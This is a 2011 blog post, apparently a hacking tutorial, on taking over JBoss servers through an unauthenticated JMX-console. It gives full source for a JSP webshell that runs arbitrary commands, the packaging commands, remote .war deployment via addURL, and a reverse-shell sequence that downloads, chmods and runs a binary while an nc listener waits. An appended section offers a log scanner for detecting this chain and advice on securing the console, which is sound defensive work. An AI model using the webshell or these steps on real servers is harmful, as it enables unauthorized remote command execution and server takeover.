Sunday, 4 December 2011

Exploit & Hack any version of JBOSS

OK, in this post I will share how to hack ANY version of JBoss and get root on the target machine.
Step by Step
1) Browse the target machine :
2) Click on the JMX-CONSOLE. If you can see the page, that's great.
3) Now you need to create a .war file containing our shell.

3.1) mkdir WEB-INF
3.2) vi cmd.jsp and insert this:

    <%-- java.io.* is required for the stream classes used below --%>
    <%@ page import="java.util.*,java.io.*"%>
    <HTML><BODY>
    Commands with JSP
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
    %>
    </pre>
    </BODY></HTML>

3.3) vi WEB-INF/web.xml and insert this:

    <?xml version="1.0" ?>
    <web-app xmlns="" xmlns:xsi="" xsi:schemaLocation="" version="2.4">
      <servlet>
        <servlet-name>Command</servlet-name>
        <jsp-file>/cmd.jsp</jsp-file>
      </servlet>
    </web-app>

3.4) Now package it: jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest web server; the target machine will need to download it from there.
4) Now browse,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case  :  and click INVOKE
7) It will take about 1 min, then you can browse your application.
8) Now you just need to type commands like "id"; if you are not root, then you need to find an exploit to root the machine.
9) Meanwhile you can get a shell on the machine by doing this:
10) Download a reverse shell to the machine: wget -P /tmp
11) chmod +x /tmp/airwolf_reverse_shell
12) Prepare your pentest machine to receive the reverse shell: nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine: /tmp/airwolf_reverse_shell
14) You are now connected to the server.
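From the other side of the fence, the whole chain above leaves a recognisable trail in the application server's access log: hits on /jmx-console, a GET-style invocation carrying methodName=addURL (or an argument ending in .war), and then requests to a freshly deployed .jsp with a cmd= parameter. The script below is an added example, not part of the original post, that scans combined-format access-log lines (Apache httpd / Tomcat AccessLogValve layout is an assumption) for exactly those three patterns. The sample log lines are constructed; the IP 203.0.113.7 and the deployed path /cmd/cmd.jsp are placeholders.

```python
"""Flag JMX-console abuse and JSP webshell use in web-server access logs.

Added example for illustration; not from the original post. The log layout
(combined/common format) and the sample lines below are assumptions.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Combined/common access-log layout, e.g. Apache httpd or Tomcat AccessLogValve.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one benign hit, a console visit, a remote .war deployment
# through the console's HtmlAdaptor, then a hit on the deployed cmd.jsp.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Dec/2011:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234
10.0.0.9 - - [04/Dec/2011:10:02:10 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120
10.0.0.9 - - [04/Dec/2011:10:02:33 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&methodName=addURL&argType=java.net.URL&arg0=http://203.0.113.7/cmd.war HTTP/1.1" 200 801
10.0.0.9 - - [04/Dec/2011:10:04:01 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 200 312
"""


def parse_line(line):
    """Split one access-log line into fields; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # First value per key only; keys lower-cased so Action=InvokeOp is not missed.
    rec['query'] = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Return detection tags for one parsed request (empty list = nothing seen)."""
    tags = []
    path = rec['path'].lower()
    q = rec['query']
    if path.startswith('/jmx-console'):
        # The console should never be reachable without authentication, so every
        # hit deserves a look. POSTed invocations do not expose their form fields
        # in an access log; the finer tags below only catch GET-style invocations.
        tags.append('jmx-console-access')
        if q.get('action', '').lower().startswith('invokeop'):
            tags.append('jmx-invoke')
            args = [v for k, v in q.items() if k.startswith('arg')]
            if (q.get('methodname', '').lower() == 'addurl'
                    or any(a.lower().endswith('.war') for a in args)):
                tags.append('jmx-remote-war-deploy')
    if path.endswith('.jsp') and 'cmd' in q:
        # A JSP taking a free-form "cmd" parameter is the webshell pattern from
        # the post; the parameter value is the command that was executed.
        tags.append('jsp-cmd-param')
        rec['cmd'] = q['cmd']
    return tags


def scan(lines):
    """Return the flagged requests, in log order, each with its tags."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'], 'path': rec['path'],
                         'tags': tags, 'cmd': rec.get('cmd')})
    return hits


if __name__ == '__main__':
    for h in scan(SAMPLE_LOG.splitlines()):
        print(h['ts'], h['ip'], h['path'], ','.join(h['tags']), h['cmd'] or '')
```

Run it against a real log with `scan(open(path).read().splitlines())`. Because the HtmlAdaptor form normally POSTs its arguments, the only reliable signal in an access log is the bare `/jmx-console` access itself; the addURL and .war tags are a bonus for GET-style invocations. The fix is to stop the console being reachable unauthenticated in the first place: JBoss ships jmx-console with its security-constraint commented out in jmx-console.war/WEB-INF/web.xml, and enabling it (or removing the console from non-admin hosts) takes away step 2 of the walkthrough entirely.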

Now r0x d4 n3tw0rk

